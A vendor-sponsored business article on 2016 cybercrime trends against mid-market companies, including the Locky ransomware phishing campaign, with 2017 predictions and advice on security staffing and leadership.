Parsing the Cybersecurity Landscape: 2016 Trends, 2017 Implications

In 2016, cyber-crime against mid-market businesses succeeded, as many experts believe, by better awareness of victims. Cyber-thieves gained access to mid-market businesses using highly targeted campaigns powered by advanced tools, and packaged to mimic familiar business communications. Based on recent exploits that reaped stratospheric sums and massive caches of personal information, 2017 promises to be another banner year for an increasingly sophisticated criminal class.

Cyber-heists pinpointing mid-market1 businesses via phishing and spam became more targeted and technologically advanced in 2016. The 2017 implications to this sector suggest that countermeasures must be more coordinated and more technologically comprehensive than ever before in order to successfully thwart the plethora of cyber-threats inundating mid-market businesses.

Cybersecurity trends and implications were reviewed in detail during the February 2017 webinar, "2017 Security Challenges - Are You Prepared?" The XO Communications sponsored webinar reviewed 2016's top cyber-crime trends that emerged from some 3,000 breaches that occurred over the course of the year. Not surprisingly, many impacted mid-market businesses.

The impact of these trends for 2017 and beyond can be seen in the wide range of security staffing and budgeting decisions that many mid-market businesses have either recently made or are in the process of making right now. These decisions will reflect a spreading recognition that cyber-crime is exploding in viral proportions fueled by smarter cyber-criminals, as well as easier-to-acquire and largely turnkey tools.

2016 Trends

Last year's top attack vectors were phishing emails, stolen credentials and network vulnerabilities that helped enable incident types including point-of-sale breaches, cyber espionage, web app attacks and more. Criminals launched attacks that were uniquely complex and multi-threaded. Many of these zero-day, router hacking, root kit and watering-hole attacks were combined with credential phishing, old exploits and macro downloaders to steal credentials and spread malware.

On the macro-downloading front, weaponized MS Office documents delivered as email attachments debuted in early 2016 in the form of Locky ransomware.2 Locky first struck in February but had already gained popularity by March when security experts, including Malwarebytes, began evaluating it. The malware is delivered by downloading an Office document with malicious macros or JavaScript included in a phishing campaign's email message.

In the Locky campaign, messages from random senders with the subject "ATTN: Invoice J-12345678" delivered an attachment, "invoice_J-12345678.doc."3 First observed by Proofpoint, the perpetrators seemed to be influenced by, or collaborating with, another known criminal outfit called Dridex. According to Proofpoint, Locky clearly drew from the Dridex playbook in terms of distribution. Just as Dridex has been pushing the limits of campaign sizes, now even higher volumes are being seen with Locky, rivaling the largest Dridex campaigns yet observed.4  

Such cyber-crime collaboration is a major trend that security companies and analysts expect to see growing in 2017 and beyond.

2017 Predictions

Drawing from developments observed in 2016, security experts concur that exploits in 2017 will be increasingly undeterred by new security tools that include EMV technology for credit card chip data. Relying largely on the stubborn effectiveness of social engineering and human error, theft with chip cards already is being seen, according to TechCrunch and other sources. The theft is possible only when banks and vendors don't correctly implement the EMV chip card standard.

At the same time, analysts predict growth in risks spawned by the Internet of Things (IoT), with platform-based and ransomware campaigns becoming more targeted and collaborative. Criminal crews are expected to increasingly join forces to more deeply gouge a growing base of enterprises deploying IoT platforms worldwide. On top of all of this, according to XO security partner BAE Systems, is the fact that the security talent gap will grow to more than one million unfilled jobs over the next four years.   

Preparing for the Worst

In so uncertain a climate for mid-market cybersecurity, enterprises are well advised to expect and prepare for the worst. As BAE Systems' Phil Bice advised in XO's February webinar, expert guidance to enterprises needs to include threat sharing, adoption of a cyber-security framework and continued investment in third-party outsourcing.

Moreover, enterprises may need to rethink traditional management structures when planning and budgeting for improved cybersecurity. In fact, the security function may prove more effective when moved outside the IT organization entirely.

At the end of the day, for many enterprises, CTOs work to boost the company's productivity and competitive stature while the CISOs strive to quantify and reduce risk. The CIO's mission traditionally is optimizing IT resources. Where in this mix comes a laser focus on cybersecurity?  The upshot for 2017 may be a new desk in many C-Suites for dedicated and strategic information-security leadership.  


1 Dun & Bradstreet, 2016: Middle market enterprises are defined as businesses generating between $10 million and $1 billion in revenues.
2 Malwarebytes Labs, 2016.
3 Proofpoint, "Dridex Actors Get in the Ransomware Game with 'Locky'," February 2016.